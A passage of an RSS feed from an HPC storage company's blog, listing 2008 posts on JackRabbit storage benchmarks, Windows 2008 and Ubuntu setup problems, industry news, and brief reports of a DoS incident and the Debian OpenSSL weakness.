      <guid>https://blog.scalability.org/2008/06/more-w2k8-thoughts-on-jackrabbit-m/</guid>
      <description>So now you know that we are testing a unit with Windows 2008 on JackRabbit. Some of the things which struck me during this load were how initially simple the OS load appeared to be. It basically copied all it needed to the disk, rebooted, and installed. Ok, great. Except for the fact that it didn&amp;rsquo;t by default, recognize the on-board NICs. This means that we need to either find a second network card, or get the NICs going on the motherboard.</description>
    </item>
    
    <item>
      <title>JackRabbit M on Windows 2008</title>
      <link>https://blog.scalability.org/2008/06/jackrabbit-m-on-windows-2008/</link>
      <pubDate>Wed, 11 Jun 2008 04:59:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/jackrabbit-m-on-windows-2008/</guid>
      <description>Testing a JackRabbit M (24 bay unit) with Windows 2008 RC2. Initial impressions are that the installation of 2008 isn&amp;rsquo;t bad at all, though it seems not to recognize things on the motherboard, like NICs. Administration is still painful &amp;hellip; things are spread out over multiple guis, and you have to struggle to get IE to behave the way you need it. So much so that Firefox 2.0.0.14 is now installed.</description>
    </item>
    
    <item>
      <title>Road runner on the test track: 1.026E15 FLOPs</title>
      <link>https://blog.scalability.org/2008/06/road-runner-on-the-test-track-1026e15-flops/</link>
      <pubDate>Mon, 09 Jun 2008 03:48:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/road-runner-on-the-test-track-1026e15-flops/</guid>
      <description>Yeah baby! The worlds fastest supercomputer is an accelerated (Cell based) system. For those who can&amp;rsquo;t parse the number, 1.026E15 is 1.026 x 10^15, or 1.026 x 1 (followed by 15 zeros). 1 Million is 1E6 or Mega, 1 Billion is 1E9 or Giga (though I understand the UK and a few others use a different phrase &amp;hellip; thousand millions), 1 Trillion is 1E12 or Tera, and 1 Quadrillion is 1E15 or Peta.</description>
    </item>
    
    <item>
      <title>Microprocessor wars, episode 6</title>
      <link>https://blog.scalability.org/2008/06/microprocessor-wars-episode-6/</link>
      <pubDate>Fri, 06 Jun 2008 19:56:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/microprocessor-wars-episode-6/</guid>
      <description>When last we left young Luke ClusterDesigner, he was pondering whether or not to use one or the other vendors chips in the latest system they were to bid to customers for an RFP. Alas, along came one (then two) chip vendors offering &amp;ldquo;marketing support&amp;rdquo; (wink wink nudge nudge, say no more!) to young Luke. The farce was indeed strong with young Luke as he applied that &amp;ldquo;marketing support&amp;rdquo; to effectively reduce the cost of the processors he put into the cluster, thus decreasing the cost of the cluster for them to build.</description>
    </item>
    
    <item>
      <title>Ever have one of those days ...</title>
      <link>https://blog.scalability.org/2008/06/ever-have-one-of-those-days/</link>
      <pubDate>Tue, 03 Jun 2008 15:46:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/ever-have-one-of-those-days/</guid>
      <description>I mean, really, one of those days. If you don&amp;rsquo;t know what I mean, then, well, you haven&amp;rsquo;t had one, and cannot commiserate. I am having one of those days. My trusty Nokia E61 is in a cab somewhere in London. Not in the same part of London that I am in. Yeah, its been one of those days.
Remember, the Crackberry &amp;hellip; er &amp;hellip; blackberry 8830 world phone &amp;ldquo;isn&amp;rsquo;t&amp;rdquo; (that is, it doesn&amp;rsquo;t work here, with their GSM card, as they cannot or will not test it before they ship it).</description>
    </item>
    
    <item>
      <title>OT: phones</title>
      <link>https://blog.scalability.org/2008/06/ot-phones/</link>
      <pubDate>Mon, 02 Jun 2008 09:46:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/ot-phones/</guid>
      <description>So I have a Blackberry. I mentioned &amp;ldquo;cold-dead fingers&amp;rdquo; before. Crackberry is appropriate. It just works. And works really really well. That is, unless you have Verizon Wireless 8830 World phone. They issue you a GSM card. They activate it for you. What they can&amp;rsquo;t do before you leave? Test it.
I am over in the UK with a non-working BlackBerry 8830 phone. Don&amp;rsquo;t get me wrong, the phone (CDMA) works well in the US.</description>
    </item>
    
    <item>
      <title>In London updated</title>
      <link>https://blog.scalability.org/2008/06/in-london-updated/</link>
      <pubDate>Mon, 02 Jun 2008 09:38:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/in-london-updated/</guid>
      <description>Talking at a conference. Conference is about outsourcing and I am talking about HPC. Go figure. Old version of this was deleted. Somehow got corrupted. Navigation in London is &amp;hellip; well &amp;hellip; a challenge. Street signs would be a nice addition. They are often hard to find if they exist at all. Determining what street you are on, and what direction you are traveling in is also a challenge.
Getting ready to leave for the conference.</description>
    </item>
    
    <item>
      <title>What are people using to read this blog?</title>
      <link>https://blog.scalability.org/2008/05/what-are-people-using-to-read-this-blog/</link>
      <pubDate>Fri, 30 May 2008 20:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/what-are-people-using-to-read-this-blog/</guid>
      <description>I make a rough guess that they are using the same tools they are using on their desktops or laptops. It is a guess. This said, some interesting trends emerge from ~2 months of data and 2000-3000 visitors per day.
Visitors OS:
[ ](http://scalability.org/images/visitors.png)
Browsers
[ ](http://scalability.org/images/browsers.png)
Search engines
[ ](http://scalability.org/images/search.png)
Ok, I am surprised. 21% of visitors appear to be using Linux. Ok, more than that, that under 70% appear to be using windows flavors.</description>
    </item>
    
    <item>
      <title>stability ... boring old and simple stability</title>
      <link>https://blog.scalability.org/2008/05/stability-boring-old-and-simple-stability/</link>
      <pubDate>Fri, 30 May 2008 19:17:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/stability-boring-old-and-simple-stability/</guid>
      <description>[xxx@yyy~]$ uptime 15:07:51 up 505 days, 47 min, 14 users, load average: 0.39, 0.35, 0.19 [xxx@yyy~]$ uname -s Linux  43.6 mega-seconds. For the pair of 1.6 GHz CPUs that are in here, this is a combined 1.4 x 10^17 clock cycles. Or for the chemists among us &amp;hellip; this is 0.23 micro-mole of clock cycles. You would need 4.3 million of these machines to provide one mole (6.022 x 10^23) cycles per year.</description>
    </item>
    
    <item>
      <title>A hint at things to come (in JackRabbit performance)</title>
      <link>https://blog.scalability.org/2008/05/a-hint-at-things-to-come-in-jackrabbit-performance/</link>
      <pubDate>Fri, 30 May 2008 05:53:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/a-hint-at-things-to-come-in-jackrabbit-performance/</guid>
      <description>Well, this is a machine going out to a customer later today. Numbers aren&amp;rsquo;t so bad. Will explain a little more in a moment.
root@pegasus-i:~# dd if=/dev/zero of=/local/data.file bs=8M count=1024 1024+0 records in 1024+0 records out 8589934592 bytes (8.6 GB) copied, 40.328 s, 213 MB/s root@pegasus-i:~# dd if=/dev/zero of=/local/data.file bs=8M count=1024 oflag=direct 1024+0 records in 1024+0 records out 8589934592 bytes (8.6 GB) copied, 25.6982 s, 334 MB/s root@pegasus-i:~# dd if=/local/data.file of=/dev/null bs=8M 1024+0 records in 1024+0 records out 8589934592 bytes (8.</description>
    </item>
    
    <item>
      <title>Next JackRabbit &#34;demo&#34; unit being built</title>
      <link>https://blog.scalability.org/2008/05/next-jackrabbit-demo-unit-being-built/</link>
      <pubDate>Thu, 29 May 2008 04:53:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/next-jackrabbit-demo-unit-being-built/</guid>
      <description>&amp;hellip; and already 2 groups want it for a month, and at least one other wants some benchmarks. Benchmarks we have agreed to run on it to date, including the usual suspects, as well as a windows server 2003 R2 file streaming BM, and some others. Some are asking us to test with various IB/10 GbE, do throughput studies, etc. There are a few new features which we will be running down over the next few weeks.</description>
    </item>
    
    <item>
      <title>You know you are old when ...</title>
      <link>https://blog.scalability.org/2008/05/you-know-you-are-old-when/</link>
      <pubDate>Wed, 28 May 2008 16:16:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/you-know-you-are-old-when/</guid>
      <description>your niece texts your wife over SMS, and she asks you &amp;ldquo;what does &amp;lsquo;KK&amp;rsquo; mean&amp;rdquo;, and you have to google it. Hit my superego where it hurts &amp;hellip;</description>
    </item>
    
    <item>
      <title>Thoughts on Ubuntu 8.04 LTS update</title>
      <link>https://blog.scalability.org/2008/05/thoughts-on-ubuntu-804-lts-update/</link>
      <pubDate>Sat, 24 May 2008 16:44:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/thoughts-on-ubuntu-804-lts-update/</guid>
      <description>Well, after using it 3 weeks on my laptop, I am underwhelmed. 7.10 was much better. Everything just worked and there were no crashes. From Firefox 3.0-beta5 which broke about 50% of my plugins, through the sudden hard locks with the Verizon cell card (the other system did not do this), to the still completely borked video driver bit. Just try to install a Cuda graphics driver. You have to edit /sbin/lrm-video and comment out its &amp;ldquo;intelligence&amp;rdquo; as the other published methods simply do not work.</description>
    </item>
    
    <item>
      <title>The economy of the future, and how not to create it</title>
      <link>https://blog.scalability.org/2008/05/the-economy-of-the-future-and-how-not-to-create-it/</link>
      <pubDate>Sat, 24 May 2008 15:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/the-economy-of-the-future-and-how-not-to-create-it/</guid>
      <description>Call this an object lesson in what not to do. Well, to be fair, the idea, the fundamental concept is excellent. It on target. Its the implementation details that turn this good idea into a waste of time, effort, and money for those competing.
This is a post about Michigan, and its 21st century fund business plan competition. It is also a post about business conditions in the state. It is also a post about areas that Michigan is investing in, and areas it should be investing in (the two are not the same).</description>
    </item>
    
    <item>
      <title>high user load</title>
      <link>https://blog.scalability.org/2008/05/high-user-load/</link>
      <pubDate>Sat, 24 May 2008 13:41:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/high-user-load/</guid>
      <description>Sorry folks, been incredibly busy for last 3 weeks. Very little time to comment on anything. Email box full of stuff I am working through. Will get back into this early this coming week.</description>
    </item>
    
    <item>
      <title>Frightening vulnerabilities ...</title>
      <link>https://blog.scalability.org/2008/05/frightening-vulnerabilities/</link>
      <pubDate>Fri, 23 May 2008 21:00:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/frightening-vulnerabilities/</guid>
      <description>There was a bit of a kerfluffle last week over weak random number generators and SSL for Debian and Debian based distributions. This vulnerability made it actually easy to crack a key generated with the OpenSSL code. Think about the basis for this risk. SSL is based upon hard to guess integers which are built out of &amp;ldquo;entropy&amp;rdquo; (the CS definition, not the physical definition) to ensure &amp;ldquo;randomness&amp;rdquo; of some sort, and then used to construct keys.</description>
    </item>
    
    <item>
      <title>Benchmarking</title>
      <link>https://blog.scalability.org/2008/05/benchmarking/</link>
      <pubDate>Sun, 18 May 2008 20:02:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/benchmarking/</guid>
      <description>I have been a long proponent of meaningful benchmarks. Meaningful benchmarks are those that can be used with a reasonable level of predictive power to help in sizing and other issues. I am also a proponent of market/institutional knowledge &amp;hellip; if you have been working in HPC for a while, you might have a clue as to how some systems run, some good design points, some really bad ideas (&amp;ldquo;hey lets run a cluster over pairs of SLIP lines&amp;rdquo;).</description>
    </item>
    
    <item>
      <title>Data size growth</title>
      <link>https://blog.scalability.org/2008/05/data-size-growth/</link>
      <pubDate>Fri, 16 May 2008 17:56:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/data-size-growth/</guid>
      <description>I don&amp;rsquo;t have any hard numbers on this, but we have been hearing from various sources that data sets and data sizes are doubling every 6 to 9 months just in the Life Sciences market. Still looking for sources for this, but this anecdotal data suggests problems with retention, management, backup, data motion, &amp;hellip;</description>
    </item>
    
    <item>
      <title>Designing to fail</title>
      <link>https://blog.scalability.org/2008/05/designing-to-fail/</link>
      <pubDate>Fri, 16 May 2008 17:45:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/designing-to-fail/</guid>
      <description>Every now and then we run into situations where someone just does not wish to succeed with their task or mission. Maybe they don&amp;rsquo;t like the mission, or the people, or the technology. They appear to be following the scope/plan of the mission, but their actions run counter to the goals that have been set out for them. Their ulterior motive is to set up the thing they were missioned to do to fail.</description>
    </item>
    
    <item>
      <title>Bonnie&#43;&#43; for deskside JackRabbit</title>
      <link>https://blog.scalability.org/2008/05/bonnie-for-deskside-jackrabbit/</link>
      <pubDate>Fri, 16 May 2008 05:37:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/bonnie-for-deskside-jackrabbit/</guid>
      <description>This is a 15 drive JackRabbit unit (under $6500 USD the way we have it configured), where we carved 2 drives out for OS, and built a RAID6 across 12 drives, with 1 hot spare. Just finished the other tests. Pretty pleased with the results. Still have to do driver and kernel updates, but I want a simple baseline test. So here it is.
root@crunch:~/jr# bonnie++ -d /big -u root -f Using uid:0, gid:0.</description>
    </item>
    
    <item>
      <title>Testing the new deskside JackRabbit</title>
      <link>https://blog.scalability.org/2008/05/testing-the-new-deskside-jackrabbit/</link>
      <pubDate>Thu, 15 May 2008 15:15:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/testing-the-new-deskside-jackrabbit/</guid>
      <description>This unit will be (eventually) the replacement for our older central server at our new space (woo-hoo!!!!). Right now, taking to the test track as it were. Simple machine: 16 GB ram, 4 cores, 7.5 TB of raw storage. In a deskside case. Works well for offices. This configuration would be right about $5900 list. RAID6 with one hot spare would drop it to 6TB for storage. Carving out 2 drives for OS (as I did) would bring it down to 5TB.</description>
    </item>
    
    <item>
      <title>Handling (accidental?) DoSing</title>
      <link>https://blog.scalability.org/2008/05/handling-accidental-dosing/</link>
      <pubDate>Wed, 14 May 2008 15:59:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/handling-accidental-dosing/</guid>
      <description>We check logs to make sure things are working. Nothing like getting a huge number of failed requests to spoil your day. So some things stick out. Like 1 request per second for 10,000+ seconds from a single site. In this case, in France. Or a bot getting stuck in a calendar. Like the Microsoft bot. In the case of the former, it happened this morning. The easiest thing to do is simply to firewall them off.</description>
    </item>
    
    <item>
      <title>CUDA and acceleration</title>
      <link>https://blog.scalability.org/2008/05/cuda-and-acceleration/</link>
      <pubDate>Tue, 13 May 2008 16:45:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/cuda-and-acceleration/</guid>
      <description>Took a Cuda class. Installed Cuda on my laptop. Well, 1.1 on my laptop. It has a Cuda class GPU (one of the things I made sure of when I bought it). 2.0 is in beta, and I think I will use that. A few minor glitches getting it going.
That said, I have some simple impressions. Cuda is going to have significant market momentum by mid year. Unlike most of the other accelerator platforms, the SDK is free, and is easy to use.</description>
    </item>
    
    <item>
      <title>HP gobbles up EDS</title>
      <link>https://blog.scalability.org/2008/05/hp-gobbles-up-eds/</link>
      <pubDate>Tue, 13 May 2008 16:04:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/hp-gobbles-up-eds/</guid>
      <description>Looks like the rumored deal closed. HP now has a generally well regarded services team, with deep US government connections. Going to give IBM a run for its money. The question is whom else will tie up? And how? EDS isn&amp;rsquo;t an HPC vendor/provider, but HP is. Which suggests that if there is money to be made in &amp;ldquo;them thar hills&amp;rdquo; of HPC (and there is), that EDS may be retooling for this.</description>
    </item>
    
    <item>
      <title>a rainy sunday morning ... no Sun shine</title>
      <link>https://blog.scalability.org/2008/05/a-rainy-sunday-morning-no-sun-shine/</link>
      <pubDate>Sun, 11 May 2008 16:38:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/a-rainy-sunday-morning-no-sun-shine/</guid>
      <description>This post at Storage Soupoffice furniture in Bulgaria eviscerates Sun&amp;rsquo;s moves in storage, and rips into thumper (x4500, which our JackRabbit competes with). Some of the writing mirrors some discussions I have had recently in terms of what has happened to Sun. Where are they going, what are they doing.</description>
    </item>
    
    <item>
      <title>long standing bugs ...</title>
      <link>https://blog.scalability.org/2008/05/long-standing-bugs/</link>
      <pubDate>Sun, 11 May 2008 05:09:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/long-standing-bugs/</guid>
      <description>Just updated laptop to Ubuntu 8.04. This is a Dell dual core unit, and while the phrase &amp;ldquo;remove it from my cold dead fingers&amp;rdquo; comes to mind (yeah, it is pretty good), some things in the new release don&amp;rsquo;t work well. Ok, well they do work better than before. But some of the &amp;ldquo;helper&amp;rdquo; bits are horribly broken. Suppose you want to install Cuda on this laptop (I did). And you want the new model Cuda aware driver (I did).</description>
    </item>
    
    <item>
      <title>Ouch ... HPC and IT companies quarterly results ...</title>
      <link>https://blog.scalability.org/2008/05/ouch-hpc-and-it-companies-quarterly-results/</link>
      <pubDate>Thu, 08 May 2008 00:37:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/ouch-hpc-and-it-companies-quarterly-results/</guid>
      <description>Well, there is an economic slowdown going on, so we shouldn&amp;rsquo;t be surprised when Intel and Microsoft post slightly lower earnings. Some HPC companies are getting hammered though. SGI just announced earnings, or more correctly, losses for the quarter. You can read it online at Yahoo finance and others. They lost 14% today. Down into the $7/share region. ClearSpeed, who I have talked about before, is being hammered. See their graph (also at Yahoo finance)</description>
    </item>
    
    <item>
      <title>JackRabbit updates</title>
      <link>https://blog.scalability.org/2008/05/jackrabbit-updates/</link>
      <pubDate>Mon, 05 May 2008 01:54:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/jackrabbit-updates/</guid>
      <description>A number of new things happening on the JackRabbit front. First, 2 new models: the deskside unit with 15 drive bays, and the JackRabbit-M (JRM) unit with 24 drive bays. The deskside is targeted at groups running calculations on their desktops or small clusters, that need a local high performance low cost storage resource. The JRM unit is midrange between the JRS and the JR, with 12-24 TB raw capacity, and 1 to 2 RAID cards.</description>
    </item>
    
    <item>
      <title>more from BioIT World Expo in Boston</title>
      <link>https://blog.scalability.org/2008/04/more-from-bioit-world-expo-in-boston/</link>
      <pubDate>Wed, 30 Apr 2008 03:06:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/more-from-bioit-world-expo-in-boston/</guid>
      <description>Long day, spent most of it talking to people and groups. This is a small conference, attendance is ok, not heavy, not light. Saw lots of people I know/knew. Some I met today. Met Deepak from BBGM in person, and a number of people I have conversed with in the past through email/phone. Saw a few old colleagues. On the exhibits/discussions &amp;hellip; some memes I see floating about, and have been hearing for a while.</description>
    </item>
    
    <item>
      <title>BioIT World 2008</title>
      <link>https://blog.scalability.org/2008/04/bioit-world-2008/</link>
      <pubDate>Tue, 29 Apr 2008 18:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/bioit-world-2008/</guid>
      <description>Short &amp;hellip; From blackberry. A number of people have noted what we have been observing, that life science users don&amp;rsquo;t want to pay for performance. Business models predicated upon higher price for perceived value of being faster won&amp;rsquo;t fly well. Similarly there is even more interest in storage.</description>
    </item>
    
    <item>
      <title>ok, the automatic update is kinda strange ... but it works</title>
      <link>https://blog.scalability.org/2008/04/ok-the-automatic-update-is-kinda-strange-but-it-works/</link>
      <pubDate>Sun, 27 Apr 2008 01:21:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/ok-the-automatic-update-is-kinda-strange-but-it-works/</guid>
      <description>20-30 mouse clicks, and I went from 2.5 to 2.5.1. There is a bug in the wizard, will file it later on. but &amp;hellip; it works. Easily. BTW: if you haven&amp;rsquo;t got the news, update your Wordpress 2.5 to 2.5.1 &amp;hellip; Now. As in immediately. Some sort of bad bug with live exploit apparently in the wild.</description>
    </item>
    
    <item>
      <title>Wherefore art thou, oh earnings ...</title>
      <link>https://blog.scalability.org/2008/04/wherefore-art-thou-oh-earnings/</link>
      <pubDate>Fri, 25 Apr 2008 00:06:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/wherefore-art-thou-oh-earnings/</guid>
      <description>I had expected Microsoft to announce another record quarter after Intel announced their results. They two did go hand in hand. Well, it turns out that Microsoft did not do as well as anticipated. Nor did Intel.
Not that there is anything wrong with Microsofts&#39; $4.39B earnings on revenue of $14.3B. Nothing at all. Very good revenue. We would like something like this on our day job. Maybe sell 1.4M JackRabbits.</description>
    </item>
    
    <item>
      <title>Wherefore art thou, open source Solaris community?</title>
      <link>https://blog.scalability.org/2008/04/wherefore-art-thou-open-source-solaris-community/</link>
      <pubDate>Thu, 24 Apr 2008 21:39:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/wherefore-art-thou-open-source-solaris-community/</guid>
      <description>Ted T&amp;rsquo;so did a good job of analyzing the current poor state of open source solaris as a community. He points to a number of community building and engineering failures (such as building a mercurial repository &amp;hellip; really it is easy). He points to the marketing and business case issues. On a humorous note, he points to the response of a Solaris engineer to posts by David Miller on why Linux outperforms Solaris on some microbenchmarks.</description>
    </item>
    
    <item>
      <title>Liveleak and platform dependence</title>
      <link>https://blog.scalability.org/2008/04/liveleak-and-platform-dependence/</link>
      <pubDate>Thu, 24 Apr 2008 12:33:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/liveleak-and-platform-dependence/</guid>
      <description>[updated] Liveleak staff support proved to be quite helpful. The issue may be less of a platform dependence as I had presumed, and more of a flash and (format/video) coding issue. [update 2] Looks like it may have been a problem in the player for flash8 video. They fixed it, within about 3 hours of my reporting it. That is the sort of service we like to deliver to our customers.</description>
    </item>
    
    <item>
      <title>Interesting ...</title>
      <link>https://blog.scalability.org/2008/04/interesting/</link>
      <pubDate>Wed, 23 Apr 2008 20:54:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/interesting/</guid>
      <description>At Storagemojo, Robin Harris has an interesting take on the evolution of storage systems.
This is interesting to us, given how much bandwidth we can provide from our JackRabbit storage systems. The issue for us is finding the right protocol to pull 750 MB/s per small unit, and distribute this to consumers of the data.</description>
    </item>
    
    <item>
      <title>Yeah, ok ... whatever</title>
      <link>https://blog.scalability.org/2008/04/yeah-ok-whatever/</link>
      <pubDate>Mon, 21 Apr 2008 22:25:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yeah-ok-whatever/</guid>
      <description>So I checked logs. Like I always do, to make sure things aren&amp;rsquo;t broken. Since yesterday, someone from Italy, specifically IP address 84.220.89.155 has been attacking our infrastructure. Their attack was a DoS. Try to bog our servers down way past the point that they could respond. They were not successful. Their ISP has been notified. Hopefully they will take action. I wonder if we need to start considering DRDOS &amp;hellip; Distributed Response to DoS.</description>
    </item>
    
    <item>
      <title>new (old) spammer tactic?</title>
      <link>https://blog.scalability.org/2008/04/new-old-spammer-tactic/</link>
      <pubDate>Mon, 21 Apr 2008 15:42:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/new-old-spammer-tactic/</guid>
      <description>Been getting quite a few mails of a bounce/spam rejection from external mailers. Turns out someone is using my day job email with random spam mail. Some sort of filter poisoning? Prevent our mails from getting to others? Obviously this must have an economic connection. But this is so specific, the only &amp;ldquo;logical&amp;rdquo; connections I can think up require donning a tin foil hat &amp;hellip;</description>
    </item>
    
    <item>
      <title>Article on MPI in 30 minutes ...</title>
      <link>https://blog.scalability.org/2008/04/article-on-mpi-in-30-minutes/</link>
      <pubDate>Sat, 19 Apr 2008 00:22:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/article-on-mpi-in-30-minutes/</guid>
      <description>is up at Linux Magazine. See here for more details. First: There are formatting errors, and a few spelling errors. This is a problem, I will construct an errata and send them a link. Second: I am told it is also in print form. And it is &amp;ldquo;severely edited for space at the expense of correctness&amp;rdquo; (hows that for a euphemism) up relative to the online form. I haven&amp;rsquo;t seen the print version yet, will go buy the mag tomorrow.</description>
    </item>
    
    <item>
      <title>Some interesting tidbits ...</title>
      <link>https://blog.scalability.org/2008/04/some-interesting-tidbits/</link>
      <pubDate>Fri, 18 Apr 2008 16:04:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/some-interesting-tidbits/</guid>
      <description>A server reliability report is out, comparing OSes and machines. Had a few surprises in it. They did note that Redhat and others had good uptime.
 [spam@scalableinformatics.com:~] 1 &amp;gt;uptime 11:43:37 up 462 days, 21:23, 11 users, load average: 0.25, 0.20, 0.31 [spam@scalableinformatics.com:~] 2 &amp;gt;cat /etc/redhat-release CentOS release 4.3 (Final)   that email is a real email address, and yes, if a spammer sends to it, our spam filtering will get better &amp;hellip;</description>
    </item>
    
    <item>
      <title>yes and no</title>
      <link>https://blog.scalability.org/2008/04/yes-and-no/</link>
      <pubDate>Fri, 18 Apr 2008 00:11:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yes-and-no/</guid>
      <description>Yes, we were knocked off the air for a bit today. No, it was not from load, hackers, etc. It was from a successful php upgrade. A long overdue one. You may have noticed the fancy coloration. Really, this happened automagically. I didn&amp;rsquo;t do it &amp;hellip; I swear! The issue was an errant plugin, that happened to die in a specific corner case. That got tripped. And stayed tripped. A quick &amp;ldquo;mv &amp;quot; saved the day.</description>
    </item>
    
    <item>
      <title>Cloud computing for HPC</title>
      <link>https://blog.scalability.org/2008/04/cloud-computing-for-hpc/</link>
      <pubDate>Wed, 16 Apr 2008 14:52:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/cloud-computing-for-hpc/</guid>
      <description>John West of Inside HPC wrote a great response to my response toDeepak of BBM. My arguments were that to enable cloud computing to work economically, one has to consider all of the costs (infrastructure, pipes, computing, people, &amp;hellip;). John&amp;rsquo;s response was that yes, and sometimes you need an act of congress to get even moderate sized infrastructure. I probably need to clarify my thoughts. I am a firm believer that this sort of computing will likely happen.</description>
    </item>
    
    <item>
      <title>What is going on with SGI?</title>
      <link>https://blog.scalability.org/2008/04/what-is-going-on-with-sgi/</link>
      <pubDate>Wed, 16 Apr 2008 14:51:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/what-is-going-on-with-sgi/</guid>
      <description>We are hearing about SGI wins on HPCwire and other venues. These should be good, and reflective in the stock price.
[ ](http://ichart.finance.yahoo.com/z?s=SGIC&amp;amp;t=2y&amp;amp;q=l&amp;amp;l=on&amp;amp;z=l&amp;amp;p=s&amp;amp;a=v&amp;amp;p=s)
But they aren&amp;rsquo;t. SGI&amp;rsquo;s market cap is 90.6M as of this morning, with 1500+ employees. Trailing 12 month revenue is 415M. They have 85M of debt. About 33.2M in cash. Something has got to give here. As they stopped making their own stuff, COGS increased, as their suppliers made more margin off completed product.</description>
    </item>
    
    <item>
      <title>Our anti-comment spam filter was targetted last night</title>
      <link>https://blog.scalability.org/2008/04/our-anti-comment-spam-filter-was-targetted-last-night/</link>
      <pubDate>Tue, 15 Apr 2008 13:20:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/our-anti-comment-spam-filter-was-targetted-last-night/</guid>
      <description>Apparently someone out there really doesn&amp;rsquo;t like how effective the anti-spam effort was. Go figure. Update: Well looks like we weren&amp;rsquo;t the only one. The SK2 RBL was knocked offline. Fixed the problem on our end, looks like someone tested the scalability of the RBL back end.</description>
    </item>
    
    <item>
      <title>Replaced networkmanager with wicd on my laptop</title>
      <link>https://blog.scalability.org/2008/04/replaced-networkmanager-with-wicd-on-my-laptop/</link>
      <pubDate>Tue, 15 Apr 2008 03:56:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/replaced-networkmanager-with-wicd-on-my-laptop/</guid>
      <description>Wow&amp;hellip; what a difference. I am typing this on my laptop after firing up wireless with our WPA2 key. Through a nice simple panel. Wireless has not worked this easily in Linux since &amp;hellip; well &amp;hellip; ever. I used to think wireless in windows was easy, though some of the connection managers are annoying. This connected right away, no problems. Showed me which access points were available. Allowed me to set up auto detection profiles.</description>
    </item>
    
    <item>
      <title>An interesting bit on IT shops ...</title>
      <link>https://blog.scalability.org/2008/04/an-interesting-bit-on-it-shops/</link>
      <pubDate>Sun, 13 Apr 2008 17:18:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/an-interesting-bit-on-it-shops/</guid>
      <description>From /., they linked to this blog post.
Interesting take. What I note is that like all infrastructure, IT is viewed as a cost center, and is often relegated to cost minimization practices. Sometimes these are a good thing. Sometimes they are a very bad thing. Real talent costs money. To a very large extent, you get what you pay for. Getting competent generalist people from a low cost body shop is possible, though more than a few of them may be paper MCSEs.</description>
    </item>
    
    <item>
      <title>Good article, with tangential relevance to HPC</title>
      <link>https://blog.scalability.org/2008/04/good-article-with-tangential-relevance-to-hpc/</link>
      <pubDate>Sat, 12 Apr 2008 16:12:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/good-article-with-tangential-relevance-to-hpc/</guid>
      <description>This was linked from Drudge or one of the other sites. Some of the articles writing is a bit on the biased side, and there are some things I don&amp;rsquo;t quite agree with. However, the thrust of the article (ignoring the title and other elements) is summarized in the last few paragraphs.
Yes. Absolutely. You sink, or you swim. In HPC, the markets are growing rapidly. And they are shifting rapidly.</description>
    </item>
    
    <item>
      <title>that they are addressing this publicly speaks volumes ...</title>
      <link>https://blog.scalability.org/2008/04/that-they-are-addressing-this-publicly-speaks-volumes/</link>
      <pubDate>Sat, 12 Apr 2008 15:10:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/that-they-are-addressing-this-publicly-speaks-volumes/</guid>
      <description>&amp;hellip; it means that they have to. That many others have asked. That this is a concern. Specifically I am talking about the MySQL acquisition by Sun. The article talking with the current VP of DB (former CEO of MySQL AB) is attempting to put to rest these fears. Unfortunately, the headline/title is designed to inject conflict.
The title of this bit is &amp;ldquo;Mickos, As New Sun Exec: Linux Will Stay In LAMP&amp;rdquo; This looks like an attempt by the author or editorial staff to inject controversy.</description>
    </item>
    
    <item>
      <title>...  and it is all so obvious to me now ...</title>
      <link>https://blog.scalability.org/2008/04/and-it-is-all-so-obvious-to-me-now/</link>
      <pubDate>Fri, 11 Apr 2008 21:17:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/and-it-is-all-so-obvious-to-me-now/</guid>
